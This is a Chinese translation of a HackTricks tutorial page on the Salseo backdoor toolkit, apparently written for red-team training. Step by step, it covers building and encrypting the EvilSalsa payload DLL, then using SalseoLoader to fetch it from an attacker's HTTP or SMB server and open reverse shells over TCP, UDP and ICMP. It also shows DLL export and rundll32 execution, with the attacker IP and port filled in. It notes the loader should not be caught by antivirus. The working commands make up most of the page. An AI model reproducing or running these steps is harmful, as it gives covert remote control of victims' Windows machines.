7.1 KiB
Salseo
从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
- 如果您想看到您的公司在 HackTricks 中做广告或下载 HackTricks 的 PDF,请查看订阅计划!
- 获取官方 PEASS & HackTricks 商品
- 探索PEASS 家族,我们的独家NFTs
- 加入 💬 Discord 群组 或 电报群组 或在 Twitter 🐦 @hacktricks_live** 上关注我们**。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。
编译二进制文件
从 github 下载源代码并编译 EvilSalsa 和 SalseoLoader。您需要安装 Visual Studio 来编译代码。
为将要使用它们的 Windows 系统的架构编译这些项目(如果 Windows 支持 x64,请为该架构编译)。
您可以在 Visual Studio 中的 左侧 "Build" 选项卡 中的 "Platform Target" 中选择架构。
(**如果找不到这些选项,请点击 "Project Tab",然后点击 " Properties")
然后,构建这两个项目(Build -> Build Solution)(在日志中将显示可执行文件的路径):
准备后门
首先,您需要对 EvilSalsa.dll 进行编码。您可以使用 python 脚本 encrypterassembly.py 或编译项目 EncrypterAssembly:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
现在你已经拥有执行所有Salseo操作所需的一切:编码的EvilDalsa.dll和SalseoLoader的二进制文件。
将SalseoLoader.exe二进制文件上传到机器上。它们不应该被任何杀毒软件检测到...
执行后门
获取TCP反向shell(通过HTTP下载编码的dll)
记得启动一个nc作为反向shell监听器,以及一个HTTP服务器来提供编码的evilsalsa。
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
获取UDP反向shell(通过SMB下载编码的dll)
记得启动一个nc作为反向shell监听器,并启动一个SMB服务器来提供编码的evilsalsa(impacket-smbserver)。
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
获取 ICMP 反向 shell(编码的 dll 已经在受害者内部)
这次你需要在客户端上使用一个特殊工具来接收反向 shell。下载: https://github.com/inquisb/icmpsh
禁用 ICMP 回复:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
执行客户端:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
在受害者内部,让我们执行salseo操作:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
编译 SalseoLoader 作为导出主函数的 DLL
使用 Visual Studio 打开 SalseoLoader 项目。
在主函数之前添加:[DllExport]
为该项目安装 DllExport
工具 --> NuGet 包管理器 --> 管理解决方案的 NuGet 包...
搜索 DllExport 包(使用浏览选项卡),然后按安装(并接受弹出窗口)
在项目文件夹中会出现文件:DllExport.bat 和 DllExport_Configure.bat
卸载 DllExport
点击 卸载(是的,这很奇怪,但相信我,这是必要的)
退出 Visual Studio 并执行 DllExport_configure
只需 退出 Visual Studio
然后,转到你的 SalseoLoader 文件夹 并 执行 DllExport_Configure.bat
选择 x64(如果你将在 x64 系统中使用它,这是我的情况),选择 System.Runtime.InteropServices(在 DllExport 的命名空间 中)并点击 应用
再次使用 Visual Studio 打开项目
[DllExport] 不应再被标记为错误
构建解决方案
选择 输出类型 = 类库(项目 --> SalseoLoader 属性 --> 应用程序 --> 输出类型 = 类库)
选择 x64 平台(项目 --> SalseoLoader 属性 --> 构建 --> 平台目标 = x64)
要 构建 解决方案:构建 --> 构建解决方案(在输出控制台中将显示新 DLL 的路径)
测试生成的 Dll
将 Dll 复制粘贴到想要测试的位置。
执行:
rundll32.exe SalseoLoader.dll,main
如果没有出现错误,那么你可能有一个功能正常的 DLL!!
使用 DLL 获取 shell
不要忘记使用 HTTP 服务器 并设置一个 nc 监听器
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
命令提示符
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索我们的独家[NFTs]收藏品,The PEASS Family
- 加入 💬 Discord群 或 电报群 或在Twitter上关注我们 🐦 @hacktricks_live.
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。